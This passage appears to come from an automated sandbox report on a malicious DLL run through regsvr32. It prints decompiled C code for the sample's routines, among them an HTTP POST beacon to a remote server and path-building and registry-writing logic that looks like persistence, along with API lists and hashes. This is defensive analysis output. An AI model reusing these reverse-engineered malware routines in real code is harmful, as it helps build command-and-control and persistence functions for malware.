                                            • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                            • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                                          • SysFreeString.OLEAUT32(?), ref: 1000DF82
                                          • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                                            • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                                          • String ID: FALSE$TRUE
                                          • API String ID: 224402418-1412513891
                                          • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                          • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                                          • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                          • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                          				char _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				int _v76;
                                          				void* _v80;
                                          				intOrPtr _v100;
                                          				int _v104;
                                          				void* _v108;
                                          				intOrPtr _v112;
                                          				intOrPtr _v116;
                                          				char* _v120;
                                          				void _v124;
                                          				char _v140;
                                          				void _v396;
                                          				void _v652;
                                          				intOrPtr _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr* _t115;
                                          				intOrPtr _t118;
                                          				intOrPtr _t121;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t131;
                                          				char _t133;
                                          				intOrPtr _t136;
                                          				char _t138;
                                          				char _t139;
                                          				intOrPtr _t141;
                                          				intOrPtr _t147;
                                          				intOrPtr _t154;
                                          				intOrPtr _t158;
                                          				intOrPtr _t162;
                                          				intOrPtr _t164;
                                          				intOrPtr _t166;
                                          				intOrPtr _t172;
                                          				intOrPtr _t176;
                                          				void* _t183;
                                          				void* _t185;
                                          				intOrPtr _t186;
                                          				char _t195;
                                          				intOrPtr _t203;
                                          				intOrPtr _t204;
                                          				signed int _t209;
                                          				void _t212;
                                          				intOrPtr _t213;
                                          				void* _t214;
                                          				intOrPtr _t216;
                                          				char _t217;
                                          				intOrPtr _t218;
                                          				signed int _t219;
                                          				signed int _t220;
                                          				void* _t221;
                                          
                                          				_v40 = _v40 & 0x00000000;
                                          				_v24 = 4;
                                          				_v36 = 1;
                                          				_t214 = __edx;
                                          				memset( &_v396, 0, 0x100);
                                          				memset( &_v652, 0, 0x100);
                                          				_v64 = E100095C7(0x85b);
                                          				_v60 = E100095C7(0xdc9);
                                          				_v56 = E100095C7(0x65d);
                                          				_v52 = E100095C7(0xdd3);
                                          				_t105 = E100095C7(0xb74);
                                          				_v44 = _v44 & 0;
                                          				_t212 = 0x3c;
                                          				_v48 = _t105;
                                          				memset( &_v124, 0, 0x100);
                                          				_v116 = 0x10;
                                          				_v120 =  &_v140;
                                          				_v124 = _t212;
                                          				_v108 =  &_v396;
                                          				_v104 = 0x100;
                                          				_v80 =  &_v652;
                                          				_push( &_v124);
                                          				_push(0);
                                          				_v76 = 0x100;
                                          				_push(E1000C379(_t214));
                                          				_t113 =  *0x1001e6a4; // 0x0
                                          				_push(_t214);
                                          				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                          					_t209 = 0;
                                          					_v20 = 0;
                                          					do {
                                          						_t115 =  *0x1001e6a4; // 0x0
                                          						_v12 = 0x8404f700;
                                          						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                          						if(_t213 != 0) {
                                          							_t195 = 3;
                                          							_t185 = 4;
                                          							_v8 = _t195;
                                          							_t118 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                          							_v8 = 0x3a98;
                                          							_t121 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t124 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t127 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                          							_t131 =  *0x1001e6a4; // 0x0
                                          							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                          							if(_a24 != 0) {
                                          								E1000980C(_a24);
                                          							}
                                          							if(_t186 != 0) {
                                          								_t133 = 0x8484f700;
                                          								if(_v112 != 4) {
                                          									_t133 = _v12;
                                          								}
                                          								_t136 =  *0x1001e6a4; // 0x0
                                          								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                          								_v8 = _t216;
                                          								if(_a24 != 0) {
                                          									E1000980C(_a24);
                                          								}
                                          								if(_t216 != 0) {
                                          									_t138 = 4;
                                          									if(_v112 != _t138) {
                                          										L19:
                                          										_t139 = E100095C7(0x777);
                                          										_t217 = _t139;
                                          										_v12 = _t217;
                                          										_t141 =  *0x1001e6a4; // 0x0
                                          										_t218 = _v8;
                                          										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                                          										E100085C2( &_v12);
                                          										if(_a24 != 0) {
                                          											E1000980C(_a24);
                                          										}
                                          										if(_v28 != 0) {
                                          											L28:
                                          											_v24 = 8;
                                          											_push(0);
                                          											_v32 = 0;
                                          											_v28 = 0;
                                          											_push( &_v24);
                                          											_push( &_v32);
                                          											_t147 =  *0x1001e6a4; // 0x0
                                          											_push(0x13);
                                          											_push(_t218);
                                          											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                          												_t219 = E10009749( &_v32);
                                          												if(_t219 == 0xc8) {
                                          													 *_a20 = _v8;
                                          													 *_a12 = _t213;
                                          													 *_a16 = _t186;
                                          													return 0;
                                          												}
                                          												_t220 =  ~_t219;
                                          												L32:
                                          												_t154 =  *0x1001e6a4; // 0x0
                                          												 *((intOrPtr*)(_t154 + 8))(_v8);
                                          												L33:
                                          												if(_t186 != 0) {
                                          													_t158 =  *0x1001e6a4; // 0x0
                                          													 *((intOrPtr*)(_t158 + 8))(_t186);
                                          												}
                                          												if(_t213 != 0) {
                                          													_t203 =  *0x1001e6a4; // 0x0
                                          													 *((intOrPtr*)(_t203 + 8))(_t213);
                                          												}
                                          												return _t220;
                                          											}
                                          											GetLastError();
                                          											_t220 = 0xfffffff8;
                                          											goto L32;
                                          										} else {
                                          											GetLastError();
                                          											_t162 =  *0x1001e6a4; // 0x0
                                          											 *((intOrPtr*)(_t162 + 8))(_t218);
                                          											_t218 = 0;
                                          											goto L23;
                                          										}
                                          									}
                                          									_v12 = _t138;
                                          									_push( &_v12);
                                          									_push( &_v16);
                                          									_t172 =  *0x1001e6a4; // 0x0
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                          										L18:
                                          										GetLastError();
                                          										goto L19;
                                          									}
                                          									_v16 = _v16 | 0x00003380;
                                          									_push(4);
                                          									_push( &_v16);
                                          									_t176 =  *0x1001e6a4; // 0x0
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                          										goto L19;
                                          									}
                                          									goto L18;
                                          								} else {
                                          									GetLastError();
                                          									L23:
                                          									_t164 =  *0x1001e6a4; // 0x0
                                          									 *((intOrPtr*)(_t164 + 8))(_t186);
                                          									_t186 = 0;
                                          									goto L24;
                                          								}
                                          							} else {
                                          								GetLastError();
                                          								L24:
                                          								_t166 =  *0x1001e6a4; // 0x0
                                          								 *((intOrPtr*)(_t166 + 8))(_t213);
                                          								_t213 = 0;
                                          								goto L25;
                                          							}
                                          						}
                                          						GetLastError();
                                          						L25:
                                          						_t204 = _t218;
                                          						_t209 = _v20 + 1;
                                          						_v20 = _t209;
                                          					} while (_t209 < 2);
                                          					_v8 = _t218;
                                          					if(_t204 != 0) {
                                          						goto L28;
                                          					}
                                          					_t220 = 0xfffffffe;
                                          					goto L33;
                                          				}
                                          				_t183 = 0xfffffffc;
                                          				return _t183;
                                          			}

                                          0x00000000
                                          0x00000000
                                          0x1000e947
                                          0x00000000
                                          0x1000e947
                                          0x1000e754
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$ErrorLast
                                          • String ID: POST
                                          • API String ID: 2570506013-1814004025
                                          • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                          • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                                          • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                          • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E100116B8(signed int* _a4) {
                                          				char _v8;
                                          				_Unknown_base(*)()* _v12;
                                          				_Unknown_base(*)()* _v16;
                                          				char _v20;
                                          				_Unknown_base(*)()* _t16;
                                          				_Unknown_base(*)()* _t17;
                                          				void* _t22;
                                          				intOrPtr* _t28;
                                          				signed int _t29;
                                          				signed int _t30;
                                          				struct HINSTANCE__* _t32;
                                          				void* _t34;
                                          
                                          				_t30 = 0;
                                          				_v8 = 0;
                                          				_t32 = GetModuleHandleA("advapi32.dll");
                                          				if(_t32 == 0) {
                                          					L9:
                                          					return 1;
                                          				}
                                          				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                          				_v12 = _t16;
                                          				if(_t16 == 0) {
                                          					goto L9;
                                          				}
                                          				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                          				_v16 = _t17;
                                          				if(_t17 == 0) {
                                          					goto L9;
                                          				}
                                          				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                          				if(_t28 == 0) {
                                          					goto L9;
                                          				}
                                          				_push(0xf0000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v8);
                                          				if(_v12() == 0) {
                                          					goto L9;
                                          				}
                                          				_t22 = _v16(_v8, 4,  &_v20);
                                          				 *_t28(_v8, 0);
                                          				if(_t22 == 0) {
                                          					goto L9;
                                          				}
                                          				_t29 = 0;
                                          				do {
                                          					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                          					_t29 = _t29 + 1;
                                          				} while (_t29 < 4);
                                          				 *_a4 = _t30;
                                          				return 0;
                                          			}
















                                          APIs
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                                          • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                          • API String ID: 667068680-129414566
                                          • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                          • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                                          • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                          • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                          				signed int _t12;
                                          				signed int _t13;
                                          				int _t15;
                                          				char* _t24;
                                          				char* _t26;
                                          				char* _t28;
                                          				char* _t29;
                                          				signed int _t40;
                                          				char* _t43;
                                          				char* _t45;
                                          				long long* _t47;
                                          
                                          				_t12 = _a20;
                                          				if(_t12 == 0) {
                                          					_t12 = 0x11;
                                          				}
                                          				_t26 = _a4;
                                          				_push(_t30);
                                          				 *_t47 = _a12;
                                          				_push(_t12);
                                          				_push("%.*g");
                                          				_push(_a8);
                                          				_push(_t26);
                                          				L10012285();
                                          				_t40 = _t12;
                                          				if(_t40 < 0 || _t40 >= _a8) {
                                          					L19:
                                          					_t13 = _t12 | 0xffffffff;
                                          					goto L20;
                                          				} else {
                                          					L100122CD();
                                          					_t15 =  *((intOrPtr*)( *_t12));
                                          					if(_t15 != 0x2e) {
                                          						_t24 = strchr(_t26, _t15);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0x2e;
                                          						}
                                          					}
                                          					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                          						L11:
                                          						_t43 = strchr(_t26, 0x65);
                                          						_t28 = _t43;
                                          						if(_t43 == 0) {
                                          							L18:
                                          							_t13 = _t40;
                                          							L20:
                                          							return _t13;
                                          						}
                                          						_t45 = _t43 + 1;
                                          						_t29 = _t28 + 2;
                                          						if( *_t45 == 0x2d) {
                                          							_t45 = _t29;
                                          						}
                                          						while( *_t29 == 0x30) {
                                          							_t29 = _t29 + 1;
                                          						}
                                          						if(_t29 != _t45) {
                                          							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                                          							_t40 = _t40 + _t45 - _t29;
                                          						}
                                          						goto L18;
                                          					} else {
                                          						_t6 = _t40 + 3; // 0x100109b2
                                          						_t12 = _t6;
                                          						if(_t12 >= _a8) {
                                          							goto L19;
                                          						}
                                          						_t26[_t40] = 0x302e;
                                          						( &(_t26[2]))[_t40] = 0;
                                          						_t40 = _t40 + 2;
                                          						goto L11;
                                          					}
                                          				}
                                          			}















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strchr$_snprintflocaleconv
                                          • String ID: %.*g
                                          • API String ID: 1910550357-952554281
                                          • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                          • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                                          • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                          • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _snprintfqsort
                                          • String ID: %I64d$false$null$true
                                          • API String ID: 756996078-4285102228
                                          • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                          • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                                          • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                          • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                          				char _v516;
                                          				void _v1044;
                                          				char _v1076;
                                          				signed int _v1080;
                                          				signed int _v1096;
                                          				WCHAR* _v1100;
                                          				intOrPtr _v1104;
                                          				signed int _v1108;
                                          				intOrPtr _v1112;
                                          				intOrPtr _v1116;
                                          				char _v1144;
                                          				char _v1148;
                                          				void* __esi;
                                          				intOrPtr _t66;
                                          				intOrPtr _t73;
                                          				signed int _t75;
                                          				intOrPtr _t76;
                                          				signed int _t81;
                                          				WCHAR* _t87;
                                          				void* _t89;
                                          				signed int _t90;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				WCHAR* _t96;
                                          				intOrPtr _t106;
                                          				intOrPtr _t107;
                                          				void* _t108;
                                          				intOrPtr _t109;
                                          				signed char _t116;
                                          				WCHAR* _t118;
                                          				void* _t122;
                                          				signed int _t123;
                                          				intOrPtr _t125;
                                          				void* _t128;
                                          				void* _t129;
                                          				WCHAR* _t130;
                                          				void* _t134;
                                          				void* _t141;
                                          				void* _t143;
                                          				WCHAR* _t145;
                                          				signed int _t153;
                                          				void* _t154;
                                          				void* _t178;
                                          				signed int _t180;
                                          				void* _t181;
                                          				void* _t183;
                                          				void* _t187;
                                          				signed int _t188;
                                          				WCHAR* _t190;
                                          				signed int _t191;
                                          				signed int _t192;
                                          				intOrPtr* _t194;
                                          				signed int _t196;
                                          				void* _t199;
                                          				void* _t200;
                                          				void* _t201;
                                          				void* _t202;
                                          				intOrPtr* _t203;
                                          				void* _t208;
                                          
                                          				_t208 = __fp0;
                                          				_push(_t191);
                                          				_t128 = __edx;
                                          				_t187 = __ecx;
                                          				_t192 = _t191 | 0xffffffff;
                                          				memset( &_v1044, 0, 0x20c);
                                          				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                          				_v1108 = 1;
                                          				if(_t187 != 0) {
                                          					_t123 =  *0x1001e688; // 0x1820590
                                          					_t125 =  *0x1001e68c; // 0x189fc68
                                          					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                          				}
                                          				if(E1000BB8D(_t187) != 0) {
                                          					L4:
                                          					_t134 = _t128;
                                          					_t66 = E1000B7A8(_t134,  &_v516);
                                          					_push(_t134);
                                          					_v1104 = _t66;
                                          					E1000B67D(_t66,  &_v1076, _t206, _t208);
                                          					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                                          					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                                          					E1000B88A(_t141,  &_v1100, _t208);
                                          					_t175 =  &_v1076;
                                          					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                                          					_v1112 = _t73;
                                          					_t143 = _t141;
                                          					if(_t73 != 0) {
                                          						_push(0);
                                          						_push(_t129);
                                          						_push("\\");
                                          						_t130 = E100092E5(_t73);
                                          						_t200 = _t199 + 0x10;
                                          						_t75 =  *0x1001e688; // 0x1820590
                                          						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                          						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                          							L12:
                                          							__eflags = _v1108;
                                          							if(__eflags != 0) {
                                          								_t76 = E100091E3(_v1112);
                                          								_t145 = _t130;
                                          								 *0x1001e740 = _t76;
                                          								 *0x1001e738 = E100091E3(_t145);
                                          								L17:
                                          								_push(_t145);
                                          								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                                          								_t201 = _t200 + 0x10;
                                          								__eflags = _t188;
                                          								if(_t188 == 0) {
                                          									goto L41;
                                          								}
                                          								_push(0x1001b9ca);
                                          								E10009F48(0xe);
                                          								E10009F6C(_t188, _t208, _t130);
                                          								_t194 = _a4;
                                          								_v1096 = _v1096 & 0x00000000;
                                          								_push(2);
                                          								_v1100 =  *_t194;
                                          								_push(8);
                                          								_push( &_v1100);
                                          								_t178 = 0xb;
                                          								E1000A0AB(_t188, _t178, _t208);
                                          								_t179 =  *(_t194 + 0x10);
                                          								_t202 = _t201 + 0xc;
                                          								__eflags =  *(_t194 + 0x10);
                                          								if( *(_t194 + 0x10) != 0) {
                                          									E1000A3ED(_t188, _t179, _t208);
                                          								}
                                          								_t180 =  *(_t194 + 0xc);
                                          								__eflags = _t180;
                                          								if(_t180 != 0) {
                                          									E1000A3ED(_t188, _t180, _t208);
                                          								}
                                          								_t87 = E1000980C(0);
                                          								_push(2);
                                          								_v1100 = _t87;
                                          								_t153 = _t188;
                                          								_push(8);
                                          								_v1096 = _t180;
                                          								_push( &_v1100);
                                          								_t181 = 2;
                                          								_t89 = E1000A0AB(_t153, _t181, _t208);
                                          								_t203 = _t202 + 0xc;
                                          								__eflags = _v1108;
                                          								if(_v1108 == 0) {
                                          									_t153 =  *0x1001e688; // 0x1820590
                                          									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                                          										_t203 = _t203 + 0xc;
                                          										goto L26;
                                          									}
                                          									_t153 = _t153 + 0x228;
                                          									goto L25;
                                          								} else {
                                          									_t91 =  *0x1001e688; // 0x1820590
                                          									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										L32:
                                          										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                          										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                          											_t183 = 0x64;
                                          											E1000E23E(_t183);
                                          										}
                                          										E100052C0( &_v1076, _t208);
                                          										_t190 = _a8;
                                          										_t154 = _t153;
                                          										__eflags = _t190;
                                          										if(_t190 != 0) {
                                          											_t94 =  *0x1001e688; // 0x1820590
                                          											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                          											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                          												lstrcpyW(_t190, _t130);
                                          											} else {
                                          												_t96 = E1000109A(_t154, 0x228);
                                          												_v1100 = _t96;
                                          												lstrcpyW(_t190, _t96);
                                          												E100085D5( &_v1100);
                                          												 *_t203 = "\"";
                                          												lstrcatW(_t190, ??);
                                          												lstrcatW(_t190, _t130);
                                          												lstrcatW(_t190, "\"");
                                          											}
                                          										}
                                          										_t93 = _a12;
                                          										__eflags = _t93;
                                          										if(_t93 != 0) {
                                          											 *_t93 = _v1104;
                                          										}
                                          										_t192 = 0;
                                          										__eflags = 0;
                                          										goto L41;
                                          									}
                                          									_t51 = _t91 + 0x228; // 0x18207b8
                                          									_t153 = _t51;
                                          									L25:
                                          									_t90 = E1000553F(_t153, _t130, __eflags);
                                          									L26:
                                          									__eflags = _t90;
                                          									if(_t90 >= 0) {
                                          										_t91 =  *0x1001e688; // 0x1820590
                                          										goto L32;
                                          									}
                                          									_push(0xfffffffd);
                                          									L6:
                                          									_pop(_t192);
                                          									goto L41;
                                          								}
                                          							}
                                          							_t106 = E1000C292(_v1104, __eflags);
                                          							_v1112 = _t106;
                                          							_t107 =  *0x1001e684; // 0x189faa0
                                          							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                          							__eflags = _t108 - _t192;
                                          							if(_t108 != _t192) {
                                          								_t109 =  *0x1001e684; // 0x189faa0
                                          								 *((intOrPtr*)(_t109 + 0x30))();
                                          								E1000861A( &_v1148, _t192);
                                          								_t145 = _t108;
                                          								goto L17;
                                          							}
                                          							E1000861A( &_v1144, _t192);
                                          							_t81 = 1;
                                          							goto L42;
                                          						}
                                          						_t116 =  *(_t75 + 0x1898);
                                          						__eflags = _t116 & 0x00000004;
                                          						if((_t116 & 0x00000004) == 0) {
                                          							__eflags = _t116;
                                          							if(_t116 != 0) {
                                          								goto L12;
                                          							}
                                          							L11:
                                          							E1000E286(_v1112, _t175);
                                          							goto L12;
                                          						}
                                          						_v1080 = _v1080 & 0x00000000;
                                          						_t118 = E100095E1(_t143, 0x879);
                                          						_v1100 = _t118;
                                          						_t175 = _t118;
                                          						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                          						E100085D5( &_v1100);
                                          						_t200 = _t200 + 0x14;
                                          						goto L11;
                                          					}
                                          					_push(0xfffffffe);
                                          					goto L6;
                                          				} else {
                                          					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                                          					_t206 = _t122;
                                          					if(_t122 == 0) {
                                          						L41:
                                          						_t81 = _t192;
                                          						L42:
                                          						return _t81;
                                          					}
                                          					goto L4;
                                          				}
                                          			}


                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$memset
                                          • String ID:
                                          • API String ID: 1985475764-0
                                          • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                          • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                                          • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                          • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                                          • SysAllocString.OLEAUT32(?), ref: 1000D764
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                                          • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                                          • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                                          • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                          • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                                          • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                          • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
